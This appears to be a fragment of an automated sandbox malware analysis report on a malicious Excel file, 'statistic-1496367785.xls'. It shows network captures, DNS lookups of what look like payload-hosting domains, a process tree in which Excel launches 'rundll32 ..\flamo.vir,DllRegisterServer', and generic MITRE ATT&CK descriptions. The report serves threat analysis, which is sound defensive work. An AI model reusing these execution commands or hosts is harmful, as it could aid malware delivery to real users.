Jun 29, 2021 17:40:37.278953075 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.279042006 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.279620886 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.280631065 CEST	443	49168	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.436506033 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.444791079 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:37.444859028 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.445382118 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.479882956 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:37.638313055 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.026087999 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.026150942 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.026344061 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.026978970 CEST	49170	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.028438091 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.184117079 CEST	443	49170	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.189817905 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.189966917 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.190619946 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.353727102 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.353754997 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:38.354274988 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.354813099 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.390655994 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:38.553565979 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.001461029 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.001487017 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.001722097 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.002619028 CEST	49171	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.004996061 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.166378975 CEST	443	49171	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.167180061 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.167383909 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.168292046 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.330358982 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.331199884 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.331335068 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.331768990 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.336335897 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.498384953 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.907809973 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.907890081 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.908579111 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:39.908631086 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.910267115 CEST	49172	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:39.911551952 CEST	49173	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:40.074424028 CEST	443	49172	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:40.074461937 CEST	443	49173	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:40.074630976 CEST	49173	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:40.075232983 CEST	49173	443	192.168.2.22	108.179.232.80
Jun 29, 2021 17:40:40.239305973 CEST	443	49173	108.179.232.80	192.168.2.22
Jun 29, 2021 17:40:40.239337921 CEST	443	49173	108.179.232.80	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 29, 2021 17:40:31.896029949 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:32.089262009 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:33.041228056 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:33.090143919 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:33.096836090 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:33.142735958 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:33.431018114 CEST	61200	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:33.491046906 CEST	53	61200	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:33.502192974 CEST	49548	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:33.579824924 CEST	53	49548	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:35.215225935 CEST	55627	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:35.393904924 CEST	53	55627	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:36.029781103 CEST	56009	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:36.079277039 CEST	53	56009	8.8.8.8	192.168.2.22
Jun 29, 2021 17:40:36.090101957 CEST	61865	53	192.168.2.22	8.8.8.8
Jun 29, 2021 17:40:36.137018919 CEST	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 29, 2021 17:40:31.896029949 CEST	192.168.2.22	8.8.8.8	0x15d4	Standard query (0)	psq.com.mx	A (IP address)	IN (0x0001)
Jun 29, 2021 17:40:35.215225935 CEST	192.168.2.22	8.8.8.8	0xaa3a	Standard query (0)	academy.haleemcampus.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 29, 2021 17:40:32.089262009 CEST	8.8.8.8	192.168.2.22	0x15d4	No error (0)	psq.com.mx		162.241.2.112	A (IP address)	IN (0x0001)
Jun 29, 2021 17:40:35.393904924 CEST	8.8.8.8	192.168.2.22	0xaa3a	No error (0)	academy.haleemcampus.com		108.179.232.80	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 29, 2021 17:40:32.464103937 CEST	162.241.2.112	443	192.168.2.22	49165	CN=psq.com.mx CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Tue Jul 28 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018	Thu Jul 29 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jun 29, 2021 17:40:32.464103937 CEST	162.241.2.112	443	192.168.2.22	49165	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031		7dcce5b76c8b17472d024758970a406b
Jun 29, 2021 17:40:35.729106903 CEST	108.179.232.80	443	192.168.2.22	49168	CN=www.academy.haleemcampus.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue May 25 09:21:24 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Mon Aug 23 09:21:24 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2116 Parent PID: 584

General

Start time:	17:40:35
Start date:	29/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f860000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2100 Parent PID: 2116

General

Start time:	17:42:31
Start date:	29/06/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\flamo.vir,DllRegisterServer
Imagebase:	0xff320000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2224 Parent PID: 2116

General

Start time:	17:42:32
Start date:	29/06/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\flamo.vir1,DllRegisterServer
Imagebase:	0xff320000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report statistic-1496367785.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "statistic-1496367785.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

Behavior

System Behavior